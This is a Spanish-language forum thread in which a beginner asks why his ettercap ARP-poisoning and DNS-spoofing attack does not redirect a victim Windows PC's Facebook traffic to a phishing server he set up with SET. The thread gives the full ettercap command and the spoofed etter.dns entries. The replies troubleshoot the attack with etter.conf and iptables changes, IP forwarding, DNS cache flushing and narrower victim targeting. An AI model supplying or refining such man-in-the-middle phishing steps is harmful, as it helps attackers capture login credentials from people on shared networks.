No funciona dns_spoof con ettercap

Iniciado por Ismael Gozales, 5 Abril 2013, 01:15 AM

0 Miembros y 1 Visitante están viendo este tema.

Ismael Gozales

Hola, esta es la primera vez que escribo para este magnífico foro, ya que estoy empezando con Backtrack y hasta el momento todo iva bien pero me he atascado.
tengo 2 pcs ambas están unidas a la misma red local , una es la PC victima (windows xp sp2) y la otra con backtrack , bien cuando monto mi servidor y trato de envenenar la red para que redireccione a mi servidor
al parecer solo me envenena ami y ala pc victima le habre las paginas originales y no lo redirecciona a mi servidor. aqui los comandos que utilizo.

monto mi servidor con SET.

Comienzo el ataque:

ettercap -T -q -P dns_spoof -M arp // // -i wlan0

etter.dns ====>

.facebook.com           A      192.168.1.60
*.facebook.com         A      192.168.1.60
www.facebook.com    A      192.168.1.60

cuando yo abro facebook desde el pc con backtrack m habre mi server , tambien si pongo la IP directamente en el navegador
pero cuando lo abro en la otra pc (no es virtual) le habre la pagina original y no mi server , de hecho si pongo la ip de mi servidor si se lo habre.

al parecer el dns_spoof no esta funcionando o hay algo mas que me falta por hacer o hago halgo mal. salu2



transfersote

-> modificaste el archivo
Citaretter.conf
para iptables??

->modificaste el
Citarip_forward
para el redireccionammiento??

:silbar: :silbar:

xustyx

Recuerda que el envenenamiento de dns puede tardar un rato debido a la cache, prueba de hacer un "ipconfig /flushdns" en la maquina windows.
Y otra cosa, supongo que hablas de maquinas fisicas, pero si virtualizas recuerda poner en modo bridge y no NAT, y centrate mas en la ip de la victima se mas especifico al envenenar, me refiero que cuando lanzes ettercap utilizes la ip de tu victima y gateway (o servidor dns) y mira si el MITM esta correctamente funcionando viendo el trafico que pasa.

Saludos